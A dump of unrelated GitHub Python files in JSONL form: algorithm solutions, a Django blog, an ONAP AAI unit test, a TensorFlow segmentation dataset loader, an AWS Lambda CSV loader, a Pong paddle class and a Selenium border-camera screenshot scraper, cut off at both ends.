print(result)\n","repo_name":"zh805/algorithm","sub_path":"leetcode/python/leetcode/editor/cn/[32]最长有效括号.py","file_name":"[32]最长有效括号.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"41117560602","text":"\n# reading data\nsource = open('source.txt', 'r')\n\n# writing data\noutput = open('output.txt', 'w')\n\n\ndef fibonacci_sequence(source, output):\n # getting data from source\n source_data = source.read().splitlines()\n source.close()\n\n # getting line indexes from source\n line_indexes = [source_data.index(i) + 1 for i in source_data]\n first_element = second_element = line_indexes[0]\n counter_value = 2\n\n sequence_elements = [first_element]\n\n for i in range(line_indexes[0], line_indexes[6]):\n # code for fibonacci sequence\n while counter_value < line_indexes.index(i) + 1:\n\n elements_sum = first_element + second_element\n first_element = second_element\n second_element = elements_sum\n counter_value += 1\n # adding fibonacci sequence to list\n sequence_elements.append(elements_sum)\n\n # checking for right index between sequence_elements and source_data\n for i in source_data:\n\n for element in sequence_elements:\n\n if source_data.index(i) == element-1:\n # reverse and writing data in output.txt\n output.write(i[::-1] + '\\n')\n\n output.close()\n\n return 'Data loaded successfully!'\n\n\nprint(fibonacci_sequence(source, output))\n","repo_name":"MrFlava/justforfun","sub_path":"Sparkybit_test_task-master/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"35748549151","text":"'''\nhttps://boj.kr/20057\n'''\nimport sys\ninput = sys.stdin.readline\n\nN = int(input())\nleft = [(-1,-1,0.1),(1,-1,0.1),(-1,0,0.07),(1,0,0.07),(-1,1,0.01),(1,1,0.01),(0,-2,0.05),(-2,0,0.02),(2,0,0.02),(0,-1,0)]\nright = [(y,-x,z) for y,x,z in left]\ndown = [(-x,y,z) for y,x,z in left]\nup = [(x,y,z) for y,x,z in left]\n\ngrid = []\nfor _ in range(N):\n row = list(map(int,input().split()))\n grid.append(row)\n\ndef solve(cnt,dy,dx,tornado_dr):\n global res, curr_y, curr_x\n\n for _ in range(cnt):\n curr_y += dy\n curr_x += dx\n total = 0\n for _dy,_dx,ratio in tornado_dr:\n ny = curr_y + _dy\n nx = curr_x + _dx\n if ratio == 0:\n new_sand = grid[curr_y][curr_x] - total\n else:\n new_sand = int(grid[curr_y][curr_x] * ratio)\n total += new_sand\n if 0 <= ny < N and 0 <= nx < N:\n grid[ny][nx] += new_sand\n else:\n res += new_sand\n\ncurr_y,curr_x = N//2,N//2\nres = 0\nfor i in range(1,N+1):\n if i == N:\n solve(i-1,0,-1,left)\n break\n if i % 2 != 0:\n solve(i,0,-1,left)\n solve(i,1,0,down)\n else:\n solve(i,0,1,right)\n solve(i,-1,0,up)\n\nprint(res)","repo_name":"jihoonyou/problem-solving-2","sub_path":"boj/samsung/20057_마법사 상어와 토네이도.py","file_name":"20057_마법사 상어와 토네이도.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"8843900932","text":"#! /usr/bin/env python\n\nimport uvmf_gen\n\n## The input to this call is the name of the desired interface\nintf = uvmf_gen.InterfaceClass('jkl')\n\n## Specify the clock and reset signal for the interface\nintf.clock = 'pjClk'\nintf.reset = 'pjRst'\n\n## Specify the ports associated with this interface.\n## addPort(,,[input|output|inout])\nintf.addPort('jkl_wdata',8,'input')\nintf.addPort('jkl_addr',16,'input')\nintf.addPort('jkl_rdata',8,'output')\n\n## Specify transaction variables for the interface.\n## addTransVar(,)\n## optionally can specify if this variable may be specified as 'rand'\nintf.addTransVar('jkl_trnVar1','byte',isrand=False)\nintf.addTransVar('jkl_trnVar2','int',isrand=True)\nintf.addTransVar('jkl_trnVar3','bit [15:0]',isrand=False)\n\n## Specify configuration variables for the interface.\n## addConfigVar(,)\n## optionally can specify if this variable may be specified as 'rand'\nintf.addConfigVar('jkl_cfgVar1','bit',isrand=False)\nintf.addConfigVar('jkl_cfgVar2','int',isrand=True)\nintf.addConfigVar('jkl_cfgVar3','bit [3:0]',isrand=False)\n\n## Set to 'True' if you want this interface code to be Veloce ready,\n## otherwise don't set or set to 'False'\nintf.veloceReady = True\n\n## This will prompt the creation of all interface files in their specified\n## locations\nintf.create()\n","repo_name":"muneeb-mbytes/UVMF","sub_path":"UVM_Framework/UVMF_3.6c/templates/python/examples/multi_file/jkl_if_config.py","file_name":"jkl_if_config.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"}
+{"seq_id":"30003403170","text":"import os\nimport re\nimport sys\nimport django\nfrom datetime import datetime\nimport ffmpeg\n\n# Set up Django's settings\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ArgusAPI.settings')\ndjango.setup()\n\nfrom API.models import Video\nfrom ArgusAPI.settings import STORAGE_ROOT\n\ndef VideoMeta():\n folder_path = STORAGE_ROOT+\"/files\"\n for file_name in os.listdir(folder_path):\n if file_name.endswith(\".mp4\") or file_name.endswith(\".mov\") or file_name.endswith(\".avi\") or file_name.endswith(\".mkv\"):\n file_path = os.path.join(folder_path, file_name)\n\n # Retrieve video thumbnail\n thumbnail_path = f\"{file_name}.jpg\"\n # thumbnail_path = os.path.join(folder_path, thumbnail_filename)\n # ffmpeg.input(file_path).output(thumbnail_path, vframes=1).run()\n \n # video info\n probe = ffmpeg.probe(file_path)\n video_stream = next((stream for stream in probe['streams'] if stream['codec_type'] == 'video'), None)\n audio_stream = next((stream for stream in probe['streams'] if stream['codec_type'] == 'audio'), None)\n file_size = os.path.getsize(file_path)\n file_type = video_stream.get(\"codec_name\")\n date_created = os.path.getctime(file_path)\n date_modified = os.path.getmtime(file_path)\n duration = video_stream.get(\"duration\")\n width = video_stream.get(\"width\")\n height = video_stream.get(\"height\")\n frame_rate = video_stream.get(\"avg_frame_rate\")\n audio_codec = audio_stream.get(\"codec_name\")\n audio_channels = audio_stream.get(\"channels\")\n audio_sample_rate = audio_stream.get(\"sample_rate\")\n \n video = Video(\n video_name = file_name,\n thumbnail_path = thumbnail_path,\n video_path = file_path,\n video_type = file_type,\n video_size = file_size,\n video_date_time = date_created,\n duration = duration,\n width = width,\n height = height,\n fps = frame_rate,\n audio_codec = audio_codec,\n audio_channel = audio_channels,\n audio_sample_rate = audio_sample_rate\n )\n # print\n # print(\"File name:\", file_name)\n # print(\"File type:\", file_type)\n # print(\"File size:\", file_size, \"bytes\")\n # print(\"Date created:\", datetime.fromtimestamp(date_created).strftime('%Y-%m-%d %H:%M:%S'))\n # print(\"Date last modified:\", datetime.fromtimestamp(date_modified).strftime('%Y-%m-%d %H:%M:%S'))\n # print(\"Duration:\", duration, \"seconds\")\n # print(\"Resolution:\", width, \"x\", height)\n # print(\"Frame rate:\", frame_rate, \"fps\")\n # print(\"Audio codec:\", audio_codec)\n # print(\"Audio channels:\", audio_channels)\n # print(\"Audio sample rate:\", audio_sample_rate, \"Hz\")\n # print(\"-----------------------------------\")\n","repo_name":"Team-Zeon/cyberx","sub_path":"ArgusAPI/API/scripts/videometadata.py","file_name":"videometadata.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"10158576463","text":"from math import sqrt \n\n\n# Fonction qui permet de determiner un rectangle dans un polygone \ndef rec(A):\n AB=sqrt((A[2]-A[0])**2+(A[3]-A[1])**2)\n AD=sqrt((A[6]-A[0])**2+(A[7]-A[1])**2)\n BC=sqrt((A[4]-A[2])**2+(A[5]-A[3])**2)\n DC=sqrt((A[4]-A[6])**2+(A[5]-A[7])**2)\n VAB=A[2]-A[0],A[3]-A[1]\n VAD=A[6]-A[0],A[7]-A[1]\n VEC=VAB[0]*VAD[0]+VAB[1]*VAD[1]\n \n if (((AB==DC) or (AD==BC) and (VEC==0))):\n return {\"Rectangle\":True}\n\n else:\n return {\"Rectangle\":False}\n\nprint(rec(A=[1,2,3,2,1,1,3,1]))\n\n","repo_name":"Manoe2006/ann-e-sco-2022-2023","sub_path":"devoir_maison_nsi.py/func_rectangle.py","file_name":"func_rectangle.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"12402770833","text":"from logging import WARNING, INFO, DEBUG\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\n\n# Set the logging level.\nlogging_level = DEBUG\n\n# Configure the Chrome settings.\nuser_data_dir = r\"C:\\works\\_tools\\selenium\\chrome\\User Data\"\nprofile_dir = r\"Default\"\ndownload_dir = r\"C:\\works\\_tools\\selenium\\chrome\\Downloads\"\n\n# Define the sequences of Ausrine.\nsequences = [\n {\"get\": {\"url\": \"https://www.google.com/?hl=en\"}},\n {\"click\": {\"by\": By.XPATH, \"value\": \"//textarea[@title='Search']\"}},\n {\"send_keys\": {\"by\": By.XPATH, \"value\": \"//textarea[@title='Search']\", \"text\": \"iphone\"}},\n {\"send_keys\": {\"by\": By.XPATH, \"value\": \"//textarea[@title='Search']\", \"text\": \" 14\", \"append\": True}},\n {\"send_keys\": {\"by\": By.XPATH, \"value\": \"//textarea[@title='Search']\", \"text\": Keys.ENTER}},\n]\n","repo_name":"naoyoshinori/ausrine_example","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"72616264808","text":"from django.shortcuts import render, redirect\nfrom django.template.loader import render_to_string\nfrom django.http import HttpResponse, HttpResponseRedirect\n\n# Create your views here.\nfrom .models import Post\n\n\ndef post_list(request):\n # html = render_to_string('blog/post_list.html')\n # posts = Post.objects.all()\n #\n # result = 'index '\n #\n # for post in posts:\n # result += f'-{post} '\n #\n # # return HttpResponse(result)\n # return HttpResponse(result)\n # render는 주어진 1,2 번째 인수를 사용해서\n # 1번째인수 : HttpRequests 인스턴스\n # 2번째인수 : 문자열(TEMPLATE['DIRS']를 기준으로 탐색할 템플릿 파일의 경로\n # return render\n posts = Post.objects.all().order_by('-id')\n context = {\n 'posts': posts,\n }\n return render(request, 'blog/post_list.html', context)\n\n\ndef post_detail(requset, post_id):\n post = Post.objects.get(id=post_id)\n context = {\n 'post': post,\n }\n\n # post_detail view function 이 ��바르게 동작하는 html을 작성해 오세요\n # post_detail.html 파일을 만들어서 post.id 값을 할당하여 해당 페이지로 넘겨주기\n return render(requset, 'blog/post_detail.html', context)\n\n\ndef post_create(request):\n # title\n # text\n # title = Post.objects.create(title=)\n # text = Post.objects.create(text=)\n context = {\n\n }\n print(request.POST.get('title'))\n print(request.POST.get('content'))\n if request.method == 'POST':\n # request의 method 값이 'POST' 일 경우\n # request.POST에 있는 title, text 값과\n # request.user 에 있는 User 인스턴스 속성을 사용해서\n # 세 post 인스턴스를 생성\n # HttpResponse를 사용해 새로생성된 인스턴스의 id, title, text 정보를 출력\n post = Post.objects.create(\n author=request.user,\n title=request.POST['title'],\n text=request.POST['content'],\n\n )\n # HTTP Redirection을 보낼 URL\n # http://localhost:8000/\n return redirect('post-list')\n else:\n return render(request, 'blog/post_create.html', context)\n\n\ndef post_delete(request, post_id):\n if request.method == 'POST':\n post = Post.objects.get(id=post_id)\n post.delete()\n return redirect('post-list')\n\n\ndef post_edit(request, post_id):\n post = Post.objects.get(id=post_id)\n\n if request.method == 'POST':\n pass\n # 글을 수정하기\n # 1. 수정할 내용(title, text)을 가져온다\n # 2. 수정할 Post 인스턴스 명시\n # 3. 해당하는 Post 인스턴스의 title, text 를 수정해서 DB에 저장\n # 4. post_detail로 이동\n title = request.POST['title']\n text = request.POST['content']\n\n # 수정해서 DB에 저장\n post.title = title\n post.text = text\n post.save()\n # return HttpResponseRedirect('/{}/'.format(post_id))\n # post-detail에 해당하는 URL 을 만들어 내려면,\n # (\\d+)에 해당하는 부분을 채울 값이 함께 필요\n return redirect('post-detail', post_id)\n # POST 방식이라면 어차피 위에서 return 되므로ㅓ else문 생략\n context = {\n 'post':post,\n }\n return render(request, 'blog/post_edit.html', context)\n","repo_name":"bear-engineer/Python-django-tutorial","sub_path":"app/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"16535934417","text":"from unittest import mock\n\nfrom onapsdk.aai.cloud_infrastructure import Complex\nfrom onapsdk.aai.cloud_infrastructure import CloudRegion\n\n\nCOMPLEXES = {\n \"complex\":[\n {\n \"physical-location-id\":\"integration_test_complex\",\n \"data-center-code\":\"1234\",\n \"complex-name\":\"integration_test_complex\",\n \"identity-url\":\"\",\n \"resource-version\":\"1588244056133\",\n \"physical-location-type\":\"\",\n \"street1\":\"\",\n \"street2\":\"\",\n \"city\":\"\",\n \"state\":\"\",\n \"postal-code\":\"\",\n \"country\":\"\",\n \"region\":\"\",\n \"latitude\":\"\",\n \"longitude\":\"\",\n \"elevation\":\"\",\n \"lata\":\"\",\n \"time-zone\":\"\",\n \"data-owner\":\"\",\n \"data-source\":\"\",\n \"data-source-version\":\"\"\n }\n ]\n}\n\n\nCOMPLEXES_COUNT = {\n \"results\":[\n {\n \"complex\":12\n }\n ]\n}\n\n\n@mock.patch.object(Complex, \"send_message\")\ndef test_complex(mock_send_message):\n cmplx = Complex(name=\"test_complex_name\",\n physical_location_id=\"test_location_id\",\n resource_version=\"1234\")\n assert cmplx.name == \"test_complex_name\"\n assert cmplx.physical_location_id == \"test_location_id\"\n assert cmplx.url == (f\"{Complex.base_url}{Complex.api_version}/cloud-infrastructure/\"\n \"complexes/complex/test_location_id\")\n\n cmplx2 = Complex.create(name=\"test_complex_name\",\n physical_location_id=\"test_location_id\")\n mock_send_message.assert_called_once()\n assert cmplx2.name == \"test_complex_name\"\n assert cmplx2.physical_location_id == \"test_location_id\"\n assert cmplx2.url == (f\"{Complex.base_url}{Complex.api_version}/cloud-infrastructure/\"\n \"complexes/complex/test_location_id\")\n method, _, url = mock_send_message.call_args[0]\n assert method == \"PUT\"\n assert url == (f\"{Complex.base_url}{Complex.api_version}/cloud-infrastructure/\"\n \"complexes/complex/test_location_id\")\n\n@mock.patch.object(Complex, \"send_message\")\ndef test_complex_update(mock_send_message):\n cmplx1 = Complex.update(name=\"test_complex_name\",\n physical_location_id=\"test_location_id\")\n mock_send_message.assert_called_once()\n assert cmplx1.name == \"test_complex_name\"\n assert cmplx1.physical_location_id == \"test_location_id\"\n assert cmplx1.url == (f\"{Complex.base_url}{Complex.api_version}/cloud-infrastructure/\"\n \"complexes/complex/test_location_id\")\n method, _, url = mock_send_message.call_args[0]\n assert method == \"PATCH\"\n assert url == (f\"{Complex.base_url}{Complex.api_version}/cloud-infrastructure/\"\n \"complexes/complex/test_location_id\")\n\n\n@mock.patch.object(Complex, \"send_message_json\")\ndef test_complex_get_all(mock_send_message_json):\n mock_send_message_json.return_value = COMPLEXES\n complexes = list(Complex.get_all())\n assert len(complexes) == 1\n cmplx = complexes[0]\n assert cmplx.name == \"integration_test_complex\"\n assert cmplx.physical_location_id == \"integration_test_complex\"\n\n\n@mock.patch.object(CloudRegion, \"add_relationship\")\n@mock.patch.object(CloudRegion, \"relationships\", new_callable=mock.PropertyMock)\n@mock.patch.object(CloudRegion, \"delete_relationship\")\ndef test_cloud_region_link_to_complex(mock_delete_relationship, mock_relationships, mock_add_rel):\n \"\"\"Test Cloud Region linking with Complex.\n\n Test Relationship object creation\n \"\"\"\n cloud_region = CloudRegion(cloud_owner=\"test_cloud_owner\",\n cloud_region_id=\"test_cloud_region\",\n orchestration_disabled=True,\n in_maint=False)\n cmplx = Complex(name=\"test_complex_name\",\n physical_location_id=\"test_location_id\",\n resource_version=\"1234\")\n cloud_region.link_to_complex(cmplx)\n mock_add_rel.assert_called_once()\n relationship = mock_add_rel.call_args[0][0]\n assert relationship.related_to == \"complex\"\n assert relationship.related_link == (f\"https://aai.api.sparky.simpledemo.onap.org:30233/aai/\"\n f\"v27/cloud-infrastructure/complexes/complex\"\n f\"/test_location_id\")\n assert len(relationship.relationship_data) == 1\n\n mock_relationships.return_value = [relationship]\n cloud_region.unlink_complex(cmplx)\n mock_delete_relationship.assert_called_once_with(relationship)\n\n\n@mock.patch.object(Complex, \"send_message_json\")\ndef test_complex_get_by_physical_location_id(mock_send_message_json):\n \"\"\"Test complex get_by_physical_location_id url creation.\"\"\"\n Complex.get_by_physical_location_id(\"test\")\n mock_send_message_json.assert_called_once_with(\n \"GET\",\n \"Get complex with physical location id: test\",\n f\"{Complex.base_url}{Complex.api_version}/cloud-infrastructure/\"\n f\"complexes/complex/test\"\n )\n\n@mock.patch.object(Complex, \"send_message\")\ndef test_complex_delete(mock_send_message):\n cmplx = Complex(physical_location_id=\"test_location_id\",\n resource_version=\"1234\")\n cmplx.delete()\n mock_send_message.assert_called_once_with(\n \"DELETE\",\n \"Delete test_location_id complex\",\n f\"{cmplx.url}?resource-version={cmplx.resource_version}\"\n )\n\n@mock.patch.object(Complex, \"send_message_json\")\ndef test_complex_count(mock_send_message_json):\n mock_send_message_json.return_value = COMPLEXES_COUNT\n assert Complex.count() == 12\n","repo_name":"onap/integration-python-onapsdk","sub_path":"tests/test_aai_complex.py","file_name":"test_aai_complex.py","file_ext":"py","file_size_in_byte":5681,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"39752904711","text":"import sys\nsys.path.append('..')\nfrom utils import param_file_access\nimport tensorflow as tf\n\nslim = tf.contrib.slim\ndataset = slim.dataset\ntfexample_decoder = slim.tfexample_decoder\n\nflags = tf.app.flags\nFLAGS = flags.FLAGS\n\n\n\n\n_ITEMS_TO_DESCRIPTIONS = {\n 'image': 'A color image of varying height and width.',\n 'labels_class': ('A semantic segmentation label whose size matches image.'\n 'Its values range from 0 (background) to num_classes.'),\n}\n\n\n\n\n\ndef get_dataset(list_path, tfrecord_path, label_map_path, ignore_label=255):\n \"\"\"Gets an instance of slim Dataset.\n\n Args:\n list_path: Path of sample list file.\n tfrecord_path: Tfrecord file path corresponding to list.\n label_map_path: Path of sample label map file.\n\n Returns:\n An instance of slim Dataset.\n\n \"\"\"\n \n num_samples = len(param_file_access.get_txt_params(list_path))\n num_classes = len(param_file_access.get_json_params(label_map_path))\n\n\n # Specify how the TF-Examples are decoded.\n keys_to_features = {\n 'image/encoded': tf.FixedLenFeature(\n (), tf.string, default_value=''),\n 'image/filename': tf.FixedLenFeature(\n (), tf.string, default_value=''),\n 'image/format': tf.FixedLenFeature(\n (), tf.string, default_value='jpeg'),\n 'image/height': tf.FixedLenFeature(\n (), tf.int64, default_value=0),\n 'image/width': tf.FixedLenFeature(\n (), tf.int64, default_value=0),\n 'image/segmentation/class/encoded': tf.FixedLenFeature(\n (), tf.string, default_value=''),\n 'image/segmentation/class/format': tf.FixedLenFeature(\n (), tf.string, default_value='png'),\n }\n items_to_handlers = {\n 'image': tfexample_decoder.Image(\n image_key='image/encoded',\n format_key='image/format',\n channels=3),\n 'image_name': tfexample_decoder.Tensor('image/filename'),\n 'height': tfexample_decoder.Tensor('image/height'),\n 'width': tfexample_decoder.Tensor('image/width'),\n 'labels_class': tfexample_decoder.Image(\n image_key='image/segmentation/class/encoded',\n format_key='image/segmentation/class/format',\n channels=1),\n }\n\n decoder = tfexample_decoder.TFExampleDecoder(\n keys_to_features, items_to_handlers)\n\n return dataset.Dataset(\n data_sources=tfrecord_path,\n reader=tf.TFRecordReader,\n decoder=decoder,\n num_samples=num_samples,\n items_to_descriptions=_ITEMS_TO_DESCRIPTIONS,\n num_classes=num_classes,\n ignore_label=ignore_label,\n name='pascal_voc_seg',\n multi_label=True)\n","repo_name":"KoapT/tf_train","sub_path":"projects/deeplab_v3plus/src/datasets/segmentation_dataset.py","file_name":"segmentation_dataset.py","file_ext":"py","file_size_in_byte":2601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"41967530560","text":"import math \ndef Calculate_Distance_Nodes(lat01,lat02,long01,long02):\n R=6378.137 #km\n lat01=float(lat01)\n lat02=float(lat02)\n long01=float(long01)\n long02=float(long02)\n dLat=(lat02-lat01)*(math.pi/180)\n dLong=(long02-long01)*(math.pi/180)\n Lat01torad=lat01*math.pi/180\n Lat02torad=lat02*math.pi/180\n Value_a=math.sin(dLat/2)*math.sin(dLat/2)+math.cos(Lat01torad)*math.cos(Lat02torad)*math.sin(dLong/2)*math.sin(dLong/2)\n Value_b=2*math.atan(math.sqrt(Value_a)/math.sqrt(1-Value_a))\n Distance=R*Value_b\n\n return Distance\ndef Calculate_Distance_Way(latlong): #takes 2 nodes same time and calulate all ways\n Distance_ways = 0\n\n for i in range(1, len(latlong)):\n a = latlong[i - 1]\n b = latlong[i]\n\n lat1 = a['lat']\n lat2 = b['lat']\n long1 = a['long']\n long2 = b['long']\n\n Distance2nodes = Calculate_Distance_Nodes(lat1, lat2, long1, long2)\n Distance_ways += Distance2nodes\n\n return Distance_ways","repo_name":"TrangNhaBui/Openstreetmap-Length-Calculation","sub_path":"Length_Calculation.py","file_name":"Length_Calculation.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"42180748134","text":"from turtle import Turtle\n\n\nclass Paddle(Turtle):\n def __init__(self, position=\"right\"):\n super().__init__()\n self.color(\"white\")\n self.penup()\n self.shape(\"square\")\n self.shapesize(stretch_wid=5, stretch_len=1)\n self.speed(\"fastest\")\n if position == \"left\":\n self.goto(-350, 0)\n else:\n self.goto(350, 0)\n\n def up(self):\n if self.ycor() < 240:\n self.goto(self.xcor(), self.ycor() + 20)\n\n def down(self):\n if self.ycor() > -240:\n self.goto(self.xcor(), self.ycor() - 20)\n\n\n","repo_name":"Aineken/python-projects","sub_path":"days/day 22 - arcade game/paddle.py","file_name":"paddle.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"636786151","text":"import boto3\nimport csv\nimport os\n\ns3_client = boto3.client('s3')\ndynamodb = boto3.resource('dynamodb')\n\ndef lambda_handler(event, context):\n bucket_name = 'your-bucket-name' # Replace with your own bucket name\n file_name = 'your-file-name.csv' # Replace with your own file name\n table_name = 'your-table-name' # Replace with your own table name\n\n # Download the CSV file from S3\n s3_client.download_file(bucket_name, file_name, '/tmp/' + file_name)\n\n # Open the CSV file and parse the data\n with open('/tmp/' + file_name, 'r') as csv_file:\n csv_reader = csv.reader(csv_file)\n next(csv_reader) # Skip the header row\n for row in csv_reader:\n item = {\n 'id': row[0],\n 'name': row[1],\n 'description': row[2],\n 'price': row[3]\n }\n \n # Add the item to the DynamoDB table\n table = dynamodb.Table(table_name)\n table.put_item(Item=item)\n\n # Clean up the temporary file\n os.remove('/tmp/' + file_name)\n\n return {\n 'statusCode': 200,\n 'body': 'Data loaded successfully to DynamoDB table'\n }\n","repo_name":"felvinerepo/MicroService_Team_A","sub_path":"newfileMS1.py","file_name":"newfileMS1.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"71513461607","text":"import SpellShop\nclass Character():\n def __init__(self):\n self.PlayerName = \"Player Name\"\n self.CharName = \"Character Name\"\n self.race = \"DWARF\"\n self.maxhealth = 20\n self.health = 20\n self.gold = 100\n # 1 = Anytime\n # 2 = Movement\n # 3 = Basic Attack\n # 4 = Spell\n self.actions = [3,4,2,1]\n self.stats = []\n self.spells = []\n self.pos_Race = [\"DWARF\", \"ELF\", \"GNOME\",\"CROWN\", \"BEAST\", \"MANDOZIAN\", \"CATHARINES\", \"ENORKANS\", \"XENOKIAN\", \"VESTIAN\", \"SWORD\", \"HERGSOIGISE\"]\n def ChangePlayerName(self, NewName):\n self.PlayerName = NewName\n def ChangeCharacterName(self, NewName):\n self.CharacterName = NewName\n def ChangeHealth(self, amount):\n self.health = self.health + amount\n if self.health > self.maxhealth:\n self.health = self.maxhealth\n if self.health <= 0:\n self.health = 0\n def ChangeRace(self):\n current = self.pos_Race.index(self.race)\n if current+1 > len(self.pos_Race)-1:\n self.race = self.pos_Race[0]\n else:\n self.race = self.pos_Race[current+1]\n def ChangeAction(self, space):\n self.actions[space] = self.actions[space]+1\n if self.actions[space] >4:\n self.actions[space] = 1\n def ChangeGold(self, amount):\n self.gold = self.gold + amount\n def AddSpell(self, SpellName):\n Spells = SpellShop.Shop()\n for i in range(0,len(Spells.SpellList)):\n if Spells.SpellList[i][0] == SpellName:\n self.spells.append(Spells.SpellList[i])\n return None\n def RemoveSpell(self, SpellName):\n for i in range(0,len(self.spells)):\n if self.spells[i][0] == SpellName:\n del self.spells[i]\n return None\n \n","repo_name":"Ghureg/VDND","sub_path":"CharTracker/libs/Char.py","file_name":"Char.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"41470130726","text":"from .EsController import EsController\n\n\nclass EsDumper:\n indices = {\n \"latvia\": {\n \"consulate\": \"latv_cons\",\n \"visaac\": \"latv_visaac\",\n \"news\": \"latv_news\",\n },\n \"poland\": {\"consulate\": \"pol_cons\", \"visaac\": \"pol_visaac\", \"news\": \"pol_news\"},\n \"lithuania\": {\n \"consulate\": \"lith_cons\",\n \"visaac\": \"lith_visaac\",\n \"news\": \"lith_news\",\n },\n \"thailand\": {\n \"consulate\": \"thai_cons\",\n \"visaac\": \"thai_visaac\",\n \"news\": \"thai_news\",\n },\n \"spain\": {\n \"consulate\": \"spain_cons\",\n \"visaac\": \"spain_visaac\",\n \"news\": \"spain_news\",\n },\n }\n\n CONSULATE = \"consulate\"\n VISA_CENTER = \"visaac\"\n NEWS = \"news\"\n\n def __init__(self):\n self.es_controller = EsController()\n\n def add_consulates(self, consulates, index_name):\n for index, consulate in enumerate(consulates):\n self.es_controller.add_data(\n index_name,\n index + 1,\n {\n \"address\": consulate[\"ADRESS\"],\n \"email\": consulate[\"EMAIL\"],\n \"telephone1\": consulate[\"PHONE_NUMBER_1\"],\n \"telephone2\": consulate[\"PHONE_NUMBER_1\"],\n \"worktime\": consulate[\"WORKING_HOURS\"],\n },\n )\n\n def add_visa_centers(self, visa_centers, index_name):\n for index, visa_center in enumerate(visa_centers):\n self.es_controller.add_data(\n index_name,\n index + 1,\n {\n \"address\": visa_center[\"ADRESS\"],\n \"email\": visa_center[\"EMAIL\"],\n \"issue_worktime\": visa_center[\"ISSUE_WORKING_HOURS\"],\n \"apply_worktime\": visa_center[\"APPLY_WORKING_HOURS\"],\n \"telephone1\": visa_center[\"PHONE_NUMBER\"],\n \"telephone2\": \"null\",\n },\n )\n\n def add_news(self, news, index_name):\n for index, news_item in enumerate(news):\n self.es_controller.add_data(\n index_name,\n index + 1,\n {\n \"date\": news_item[\"DATE\"],\n \"title\": news_item[\"TITLE\"],\n \"body\": news_item[\"BODY\"],\n \"link\": news_item[\"LINK\"],\n },\n )\n\n def init_indices(self, data, country):\n [\n self.es_controller.delete_index(index)\n for index in [\n EsDumper.indices[country][\"consulate\"],\n EsDumper.indices[country][\"visaac\"],\n EsDumper.indices[country][\"news\"],\n ]\n ]\n self.add_consulates(data[\"CONSULATE\"], EsDumper.indices[country][\"consulate\"])\n self.add_visa_centers(data[\"VISAAC\"], EsDumper.indices[country][\"visaac\"])\n self.add_news(data[\"NEWS\"], EsDumper.indices[country][\"news\"])\n","repo_name":"svyatjes/visa_app","sub_path":"flask_app/es/EsDumper.py","file_name":"EsDumper.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"35091586588","text":"import csv\nimport datetime\nimport os\nimport traceback\n\nimport undetected_chromedriver as uc\nfrom selenium.webdriver.common.by import By\nfrom seleniumbase import page_actions\n\nfrom models import BorderCapture, Camera, database\nfrom send_msg import logger, send_to_qu\nfrom utils import retry\n\nRETRY_ATTEMTPS = 5\n\n\n@retry(retries=RETRY_ATTEMTPS)\ndef fetch_image(url, location):\n\n if not url:\n url = os.environ[\"URL\"]\n if not location:\n location = os.environ[\"URL_LOCATION\"]\n\n options = uc.ChromeOptions()\n options.add_argument(\"--no-sandbox\")\n options.add_argument(\"--headless=chrome\")\n options.add_argument(\"--disable-gpu\")\n options.add_argument(\"--disable-dev-shm-usage\")\n driver = uc.Chrome(options=options, driver_executable_path=\"./chromedriver\")\n\n try:\n try:\n # Check the database connection before fetching the image\n database.connect(reuse_if_open=True)\n except:\n logger.error(traceback.format_exc(limit=1))\n raise Exception(\"Database connection can not be established.\")\n\n driver.get(url)\n\n page_actions.wait_for_element(driver, selector=\"videoImage\", by=By.ID)\n\n image = driver.find_element(By.ID, \"videoImage\")\n image_name = str(int(datetime.datetime.utcnow().timestamp())) + \".png\"\n\n image_location = location + \"/\" + image_name\n\n # Save image to folder with a relative location\n image.screenshot(\"./data/\" + image_location)\n\n assert image_name in os.listdir(\"./data/\" + location + \"/\")\n logger.info(\n f\"[parser] Successfuly fetched an image - {image_name} at {location}!\"\n )\n\n camera_id = Camera.get_or_create(location_name=location)[0].id\n\n model = BorderCapture.create(\n camera_id=camera_id,\n image_path=os.getcwd() + \"/data/\" + image_location,\n )\n database.close()\n except Exception as e:\n driver.quit()\n raise e\n driver.quit()\n # ID is of type UUID, thus conversion req.\n return str(model.id)\n\n\nif 